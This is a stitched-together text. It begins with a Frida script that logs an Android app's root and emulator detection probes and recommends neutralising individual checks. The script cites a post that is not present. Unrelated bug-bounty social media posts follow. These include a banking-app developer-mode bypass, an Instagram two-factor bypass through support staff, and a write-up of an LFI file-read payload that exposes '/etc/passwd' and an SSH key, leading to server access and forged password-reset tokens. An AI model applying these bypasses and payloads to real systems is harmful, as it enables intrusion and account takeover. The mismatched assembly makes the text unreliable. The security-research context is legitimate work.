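A passive observer for the file probes listed above, added here as an example and not the author's tooling: it hooks java.io.File.exists() and libc access() under Frida and logs which of the documented root, busybox, magisk, emulator and Xposed paths the shield SDK touches, without spoofing any result. The classifier is plain JavaScript and runs outside Frida; the directory and binary lists are taken from the post, and "/proc/self/maps" is added as the generic form of the /proc/<pid>/maps read.

```javascript
// Added example, not the author's tooling: log (never spoof) the file probes a
// shield SDK makes, classified against the paths documented in the post above.
// Only the guarded block at the end needs Frida.

const PROBE_DIRS = [
  "/data/local", "/data/local/bin", "/data/local/xbin", "/sbin", "/su/bin",
  "/system/bin", "/system/bin/.ext", "/system/bin/failsafe", "/system/sd/xbin",
  "/system/usr/we-need-root", "/system/xbin", "/cache", "/data", "/dev", "/xbin",
];
const PROBE_BINARIES = ["su", "busybox", "magisk"];

// Map a probed path to the detection category it belongs to, or null if it is
// not one of the documented checks.
function classifyProbe(p) {
  const m = p.match(/^(.*)\/([^/]+)$/);
  if (m && PROBE_BINARIES.includes(m[2]) && PROBE_DIRS.includes(m[1])) return m[2];
  if (p === "/metadata/magisk/zygisk_lsposed") return "magisk";
  if (p === "/mnt/windows/BstSharedFolder" || p === "/proc/cpuinfo" ||
      /^\/sys\/devices\/system\/cpu\/cpu\d+\/cpufreq\/scaling_cur_freq$/.test(p)) return "emulator";
  if (p === "/system/framework/XposedBridge.jar" || /^\/proc\/(\d+|self)\/maps$/.test(p)) return "xposed";
  return null;
}

// Running tally per category; read it from the Frida REPL to see what fired.
const seen = {};
function record(p, via) {
  const cat = classifyProbe(p);
  if (!cat) return null;
  seen[cat] = (seen[cat] || 0) + 1;
  console.log(`[probe] ${cat.padEnd(8)} ${via.padEnd(6)} ${p}`);
  return cat;
}

if (typeof Java !== "undefined") {
  // Java-level checks: new File(path).exists(). The original method is always
  // called and its result returned unchanged.
  Java.perform(function () {
    const File = Java.use("java.io.File");
    File.exists.implementation = function () {
      record(this.getAbsolutePath(), "java");
      return this.exists();
    };
  });
  // Native-level checks: access(path, mode) in libc. stat()/fopen() can be
  // attached the same way if the SDK uses them instead.
  const access = Module.findExportByName("libc.so", "access");
  if (access !== null) {
    Interceptor.attach(access, {
      onEnter(args) { record(args[0].readUtf8String(), "access"); },
    });
  }
}
```

Because the logic is decrypted only at startup, spawn the app with Frida (`frida -U -f <package> -l probes.js`) so the hooks are in place before the first check runs; attaching to a running process will miss the probes that already completed. Seeing which category fires first tells you which single check to neutralise, which is the surgical approach the earlier mTLS post recommends over blanket hooking.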
Replying to @xMBGx
Resistance: Fall of Man @insomniacgames
Choose your own font for @CaidoIO from the selection, or upload a font of your choice. The plugin also offers effects for characters, such as shaking. #bugbounty #bugbountytips
🆕🖋️ New plugin in the Caido Store! Introducing “Font Selector” by @Tur24Tur. Customize Caido’s interface with a range of fonts and text effects, including options for custom font uploads and subtle animations. Check it out: github.com/BugBountyzip/Caid…
Replying to @h4x0r_dz
Linux users can't verify if they're robots.
Banking apps may detect Developer mode on Android, but you can bypass it using LSPosed's IAMNotADeveloper 🚫 module. Check it out here: 🔗 github.com/Xposed-Modules-Re… #bugbountytips #bugbounty
Replying to @Bugcrowd
I received an email saying that my password was reset for security reasons. I'm concerned there might be a breach or an info stealer on my machine. 🤣 I even reviewed the event logs and didn’t find any signs of unauthorized access to my account
Someone shared a method to bypass @instagram two-factor authentication by contacting the support team. The process involves using the contact form on the mobile app when attempting to log in. Upon reaching out, an employee might provide you with an 8-digit backup code to regain access. For anyone at Facebook who would like to investigate, my username was tjr. The guy who stole it is @_TJRTrades
Replying to @dPhoeniixx
i feel like you were begging a company to get a CVE and they ignored you then you felt oppressed by someone else's work Just shut up and mind your own business
A Local File Inclusion vulnerability in an Angular website allowed an SSH private key to be obtained, leading to server control #BugBounty #bugbountytips
🔴How I fully took control of a server belonging to one of the sensitive entities and discovered more than 15 critical vulnerabilities. A Single LFI to +15 Critical Bugs: A Web-Boundary Pivoting Story. Good evening, I'm back with a new article after a break, but as they say, a long absence brings back the spoils. Today, God willing, I'll talk about how I discovered a vulnerability through which I found 15+ other critical vulnerabilities in one of the sensitive entities.

# The Beginning
During testing I noticed that the site was built with Angular, which means the JS files would be a treasure for understanding the nature of the site. On the first day of testing I didn't get a direct result, but I came out with the most important thing: I understood the target better. Continuing, since there were several Roles on the site, and as a normal user I only had a few Functions visible to me, I decided to focus my analysis entirely on the JS files. And here it's time to talk about runtime.js, which is a JavaScript file found on sites that use Frameworks like Angular. Its idea, in short, is that it defines the other JS files and uses them when needed; these files are called chunks, and they are all JS files. I built a script that loads the JS files defined in the runtime directly, and I was able to collect more than 35 files and started analyzing them one by one. To cut a long story short, in one of the files I found a Function defined as preview-attachment, whose job is to display attachments or images. Through my analysis of the JS I noticed that it uses two identifiers in different Functions to display images:
- filePath
- fileName
In some other Functions on the site only fileName was used, but it was restricted to a specific path, with Validation on the Input, and it displays images from a fixed path directly from the server-side. What are you getting at, Omar? Meaning that reaching files other than images was not possible using the fileName parameter. But what about filePath? If I add it in the same Request, it overwrites the value of fileName, because the server-side prefers filePath over fileName. An important point: I can't remove fileName because it is a Mandatory Parameter that must be present in the Request. And in the filePath Parameter I was able to specify the path it previews or displays the image from.
But the question is: is the path restricted to displaying images only? The answer is no (; As we can see, with this method I was able to read /etc%0a/%0apasswd. No impact? But here we reached the ssh private key. Most people might stop here and submit their report, but since you're a bug hunter, you try to make a vulnerability out of anything, and sometimes it doesn't hurt to explore a bit (;

# Accessing Private SSH Keys to RCE
After getting the SSH keys, I connected to the same IP of the server the site was running on and was able to fully access the server. Most people here would submit the report and stop, but have you ever heard of the term pivoting? No, I don't mean pivoting at the network level, but pivoting at the web application level. After gaining access to the server, the first step I took was to look at the source code, and I discovered some vulnerabilities through my analysis of the source code, including a full Account takeover of any account registered with the entity, which was through the reset password function.

# From Source Code Review to 0-Click ATO & 15+ Critical Bugs Uncovered
I noticed that a token is generated if you want to reset your password, but the token was generated this way: in short, it takes the ID and the current time (timestamp) and hashes them using SHA1. Since SHA-1 has no secret key or salting at all, it means we can derive any reset token. So I easily wrote a script that exploits this process, and I was able to take over any account registered with the entity using only the ID number. Nice, and what about pivoting, Omar? Here I come back to pivoting, but at the web application level. The same entity had several other sites, so I tried to check the same concept on the other sites belonging to the entity, and indeed the same logic was used, so I exploited them the same way. Through the source code review I was able to discover many other vulnerabilities as well; through pivoting I was able to discover over 15+ critical and high-severity vulnerabilities, which might be covered in a second part. In conclusion, I hope my explanation was clear and useful, and thank you for your time and for reading.
1
12
1,177
I will not use Bandicam anymore! I am working on a tool for quick Proof of Concept (PoC) screen recording, similar to the one on HackerOne, but with some changes. #BugBounty 👇
2
13
2,051
Replying to @h4x0r_dz
That guy is asking us to resubscribe to @ChatGPTapp again 😂
1
13
852
While writing this Burp Suite Bambda, specifically the opcodes, I initially left it incomplete, feeling that no one would use it. However, I was surprised by the positive feedback and the memes people shared on Telegram, which really motivated me to continue. I may consider targeting a different architecture in the future since PowerPC is less common compared to others. This makes it possible to not only analyze malware's web traffic but also to read and understand its binary instructions. Attached are some memes created by bug bounty hunters on Telegram.
Just extended Burp Suite beyond its traditional use by making it capable of disassembling and analyzing PlayStation 3 games' ELF files with my first Bambda script, targeting the PowerISA-Altivec-64-32addr architecture! This could make Burp Suite more powerful for looking inside binaries, not just network traffic! #bugbounty #BurpSuite #PS3 #Bambdas
1
13
1,576
6/ 📢 If you've discovered a bug 🐞, have ideas for improvement 💡, or want to suggest new features, don't hesitate to reach out. Your input helps shape BugBounty.zip, making it the best it can be for the community. Let's collaborate! github.com/BugBountyzip/bugb… 🤝 (6/6)
1
2
11
1,935
Replying to @securibee
Gwhwj466jwhwj.txt JajH47hwhio.txt Ahajh7177.txt
2
11
397
Now available 🔥
🛡️✨ Another addition to the Caido Store! Introducing "CSRF PoC Generator" by @Tur24Tur. Generate various types of CSRF PoC payloads from requests. Check it out: github.com/BugBountyzip/Caid…
1
12
1,144